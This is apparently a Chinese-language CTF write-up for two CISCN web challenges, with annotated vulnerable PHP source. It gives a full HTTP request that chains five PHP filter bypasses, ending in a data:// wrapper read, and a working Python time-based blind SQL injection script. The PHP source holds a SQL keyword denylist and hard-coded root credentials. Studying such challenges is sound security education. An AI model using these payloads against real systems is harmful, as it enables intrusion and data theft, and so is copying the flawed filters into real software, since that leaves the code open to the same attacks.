
06/10
14:54
web

ciscn_1/2_web

day_2

web_2

// Challenge entry point: five checks run in sequence; each failure prints
// "Hello Hack" with one more trailing dot, so the dots tell you which
// check rejected the request.
echo "Null ... Null ... Null ... ";

// ?src shows this file's own source (the challenge is deliberately white-box).
if(isset($_GET['src'])) {
    die(highlight_file('index.php', true));
}

// Check 1: warnings are silenced, then every $_REQUEST value is rejected if
// it contains an ASCII letter. Two weaknesses: a non-string value (an array
// from `name[]`) makes preg_match() fail silently rather than die, and which
// source wins for a key present in both GET and POST depends on PHP's
// request_order, so the value inspected here need not be the one $_GET
// later reads.
error_reporting(0);
if($_REQUEST){
    foreach ($_REQUEST as $key => $value) {
        if(preg_match('/[a-zA-Z]/i', $value)) die('Hello Hack.');
    }
}

// Check 2: keyword filter applied to the *raw* query string. QUERY_STRING is
// not URL-decoded, so a percent-encoded parameter name passes this regex
// while $_GET still receives the decoded name. Filtering should be done on
// the decoded values, not on the wire form.
if($_SERVER){
    if(preg_match('/cyber|flag|ciscn/i', $_SERVER['QUERY_STRING'])) die('Hello Hack..');
}

if(isset($_GET['cyber'])){
    // Check 3: the tail of the value from offset 32 must equal its own md5.
    // There is no is_string() guard; with warnings suppressed a non-string
    // input presumably degrades both sides to the same non-string result so
    // the === succeeds (PHP 8 would raise a TypeError instead — confirm the
    // target version).
    if(!(substr($_GET['cyber'], 32) === md5($_GET['cyber']))){ 
        die('Hello Hack...');
    }else{
        // Check 4: must match /^ciscnsec$/ yet not be identical to 'ciscnsec'.
        // Without the D (DOLLAR_ENDONLY) modifier `$` also matches just
        // before a final "\n", so the two conditions are not contradictory.
        // Use \z (or the D modifier) when an exact end-of-string is meant.
        // $_GET['flag'] is then handed to file_get_contents() without any
        // validation, so every registered stream wrapper (php://, data://,
        // http://, ...) is reachable — an allowlist of paths is the fix.
        if(preg_match('/^ciscnsec$/', $_GET['ciscn']) && $_GET['ciscn'] !== 'ciscnsec'){
            $getflag = file_get_contents($_GET['flag']);
        }else
            die('Hello Hack....');
        // Check 5: whatever was read must be exactly 'security'.
        if(isset($getflag) && $getflag === 'security'){
            include 'flag.php';
            echo $flag;
        }else die('Hello Hack.....');
    }
}

首先是第一个check，用POST提交一个同名key、值为纯数字的参数就行

第二个check因为是$_SERVER['QUERY_STRING']获取的uri,所以可以经过url编码直接搞定

第三个check很常见,提交数组格式完成绕过

第四个check关键点在于preg_match的多个模式,由于没有开启/D修饰符，$ 也能匹配末尾换行符之前的位置,那么用%0a换行即可

第五个check可以看看php伪协议,使用data://text/plain,security通过最后一段校验

最终payload

POST /?%63%79%62%65%72%5b%5d&%63%69%73%63%6e=%63%69%73%63%6e%73%65%63%0a&%66%6c%61%67=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%73%65%63%75%72%69%74%79 HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Connection: close
Upgrade-Insecure-Requests: 1

ciscn=777&flag=777

web_1

很简单的一个time based sql injection,因为一开始直接告诉了表名和列名,并且预先知道flag格式与长度,可以只跑6~15位,直接贴payload

import requests
import time
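url = "http://localhost:8888/web1/index.php"
# Candidate characters tried at each flag position. Named `charset` so the
# builtin `list` is not shadowed (the original listing called this `list`).
charset = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM{}_!@#$%^&*()"
flag = ""
# Time-based blind probe: elt(cond, sleep(1)) delays the response only when
# the character at 1-based offset {q} has ASCII code {attack}. It contains
# none of the tokens in the challenge's safe() denylist (no spaces, no
# comment markers, no or/and), which is exactly why a denylist is no
# substitute for a bound parameter.
payload = 'elt(ascii(substr((select(flag)from(ctf)),{q},1))={attack},sleep(1))'
# Seconds above which a response is treated as having hit sleep(1). Kept at
# the original 2 s; a slow link can still produce false positives.
DELAY_THRESHOLD = 2


def _build_payload(pos, ch):
    """Return the probe string for position `pos` testing character `ch`."""
    return payload.format(q=pos, attack=ord(ch))


def _probe(pos, ch):
    """POST one probe and report whether the server delayed its reply."""
    start = time.time()
    requests.post(url, data={"id": _build_payload(pos, ch)})
    return time.time() - start > DELAY_THRESHOLD


if __name__ == "__main__":
    # Only positions 6..15 are probed: the flag format and length are known
    # in advance (see the text above the listing).
    for pos in range(6, 16):
        for ch in charset:
            if _probe(pos, ch):
                flag += ch
                print(flag)
                break
        else:
            # The original silently skipped a position with no hit, which
            # shifts every later character; make the gap visible instead.
            print("no match at position", pos)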

下面是它的源码 

// Database credentials hard-coded in the challenge source (the commented
// duplicates are reproduced as published). Outside a CTF these belong in
// configuration kept out of the web root, not in index.php.
$dbuser='root';
//$dbuser='root';
$dbpass='root';
//$dbpass='root';
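/**
 * Reject a user-supplied SQL fragment that contains any denylisted token.
 *
 * The comparison is case-insensitive (stripos). A denylist like this is
 * inherently incomplete — it cannot enumerate every MySQL expression — so
 * the structural fix is a bound parameter (mysqli/PDO); this function only
 * closes the two defects in the original: a token at offset 0 was accepted
 * because stripos() returned the falsy 0, and a non-string value (an array
 * from `id[]`) was passed straight to stripos().
 *
 * @param mixed $sql value taken from the request
 * @return bool true when $sql is a string containing no denylisted token
 */
function safe($sql){
    // Arrays and other non-strings cannot be safely searched; reject them.
    if(!is_string($sql)){
        return False;
    }
    $blackList = array(' ','||','#','-',';','&','+','or','and','`','"','insert','group','limit','update','delete','*','into','union','load_file','outfile','./');
    foreach($blackList as $blackitem){
        // stripos() returns 0 for a match at the start of the string, which
        // is falsy; compare against false explicitly so a leading token
        // (e.g. "union...") is rejected like any other.
        if(stripos($sql,$blackitem) !== false){
            return False;
        }
    }
    return True;
}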
// The only input is POST id; a request without it ends silently.
if(isset($_POST['id'])){
    $id = $_POST['id'];
}else{
    die();
}
// Legacy ext/mysql (removed in PHP 7): no prepared-statement API, which is
// why the query below can only be built by string interpolation.
$db = mysql_connect("localhost",$dbuser,$dbpass);
if(!$db){
    die(mysql_error());
} 
mysql_select_db("ctf",$db);
// safe() is a token denylist, not an escape or a type check: $id is still
// spliced verbatim into the SQL text, so any expression that avoids the
// listed tokens reaches MySQL unchanged. A bound parameter (mysqli/PDO) is
// the only fix that does not depend on guessing every dangerous token.
if(safe($id)){
    $query = mysql_query("SELECT content from passage WHERE id = ${id} limit 0,1");
    if($query){
        $result = mysql_fetch_array($query);
        if($result){
            echo $result['content'];
        }else{
            echo "Error Occured When Fetch Result.";
        }
    }else{
        // A failed query only dumps `false`, so the response body leaks
        // nothing — but response *timing* still does, which is the channel
        // the probe script above relies on.
        var_dump($query);
    }
}else{
    die("SQL Injection Checked.");
}
